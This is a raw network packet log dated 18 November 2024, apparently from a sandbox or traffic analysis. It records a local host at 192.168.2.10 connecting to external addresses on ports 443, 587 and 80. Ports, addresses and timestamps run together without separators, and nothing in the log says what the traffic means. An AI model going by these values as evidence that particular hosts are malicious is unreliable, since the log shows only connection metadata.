                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:54.820014954 CET44349940104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:54.873081923 CET49940443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:54.915349007 CET44349940104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:55.044287920 CET44349940104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:55.044364929 CET44349940104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:55.044414997 CET49940443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:56.959404945 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:56.959455967 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:56.959552050 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:56.963323116 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:56.963336945 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.575191975 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.575308084 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.576909065 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.576915979 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.577327013 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.615171909 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.655329943 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790014982 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790066004 CET44349953104.26.13.205192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.790122032 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:57.795286894 CET49953443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.490545988 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.495640993 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:58.499636889 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.298537970 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.304847956 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.310528994 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545109034 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545281887 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.550126076 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.786170006 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.786669016 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.791554928 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033181906 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033209085 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033221960 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033235073 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033272028 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.033303022 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.046624899 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.051503897 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.287183046 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.291992903 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.296948910 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.532656908 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.533032894 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.537993908 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.774097919 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.774507999 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:00.779459953 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.018470049 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.023262024 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.028183937 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.264014959 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.266088009 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.270981073 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.397564888 CET804992982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.397627115 CET4992980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.401643038 CET4992980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.406696081 CET804992982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.520123005 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.520492077 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.525433064 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.761976004 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.763876915 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.763911963 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.763911963 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.763923883 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.768770933 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.768784046 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.768824100 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.768835068 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.017102957 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.183676004 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.400160074 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.405047894 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.500696898 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.505744934 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.505958080 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.509984970 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.509984970 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.515496016 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.515517950 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.641030073 CET5874996151.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.641499043 CET49961587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.641943932 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.648467064 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:02.648575068 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.455595016 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.455899954 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.461612940 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.699121952 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.699523926 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.704381943 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.943224907 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.943614006 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.948478937 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192724943 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192743063 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192758083 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192766905 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192802906 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.192842007 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.200114012 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.204981089 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.205579042 CET4989780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.207927942 CET49884587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.443808079 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.444884062 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.449867010 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.688380957 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.750272989 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.755294085 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.994520903 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.994777918 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:04.999929905 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.241844893 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.242567062 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.247838974 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.435203075 CET49940443192.168.2.10104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.486308098 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.486865044 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.492139101 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.734410048 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.734666109 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.739626884 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.978282928 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979070902 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979070902 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979157925 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979202032 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979345083 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979345083 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.979470015 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984075069 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984086990 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984097004 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984179974 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984236956 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984353065 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984361887 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984427929 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984437943 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:05.984453917 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:06.226747036 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:06.371274948 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994431019 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994715929 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.994977951 CET4997880192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:10.999758005 CET804997882.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.091238022 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096051931 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096231937 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.096322060 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.101161957 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.101175070 CET804999982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.449501991 CET4999980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.585391998 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.590325117 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592221975 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592339993 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.592356920 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.597208977 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:13.597222090 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.943141937 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.948117018 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.948388100 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.952994108 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.957951069 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.957973957 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.069251060 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.069432974 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.074598074 CET805000047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.074666023 CET5000080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.268124104 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273032904 CET805000213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273581982 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273842096 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.273859024 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.278881073 CET805000213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.278898954 CET805000213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.449697971 CET5000280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.586905003 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.591773033 CET805000313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.591852903 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.592030048 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.592030048 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.596812963 CET805000313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.596839905 CET805000313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.787637949 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.788194895 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.793436050 CET805000154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.793482065 CET5000180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.800548077 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.805803061 CET805000418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.806420088 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.806526899 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.806541920 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.811422110 CET805000418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.811448097 CET805000418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.031522036 CET805000313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.046127081 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.051959991 CET805000313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.052031040 CET5000380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.264738083 CET805000418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.308698893 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.503086090 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.508443117 CET805000418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.509525061 CET5000480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.707660913 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.712717056 CET805000554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.714411020 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.714605093 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.714628935 CET5000580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.720016003 CET805000554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.720033884 CET805000554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.848118067 CET5000680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.853040934 CET805000644.221.84.105192.168.2.10
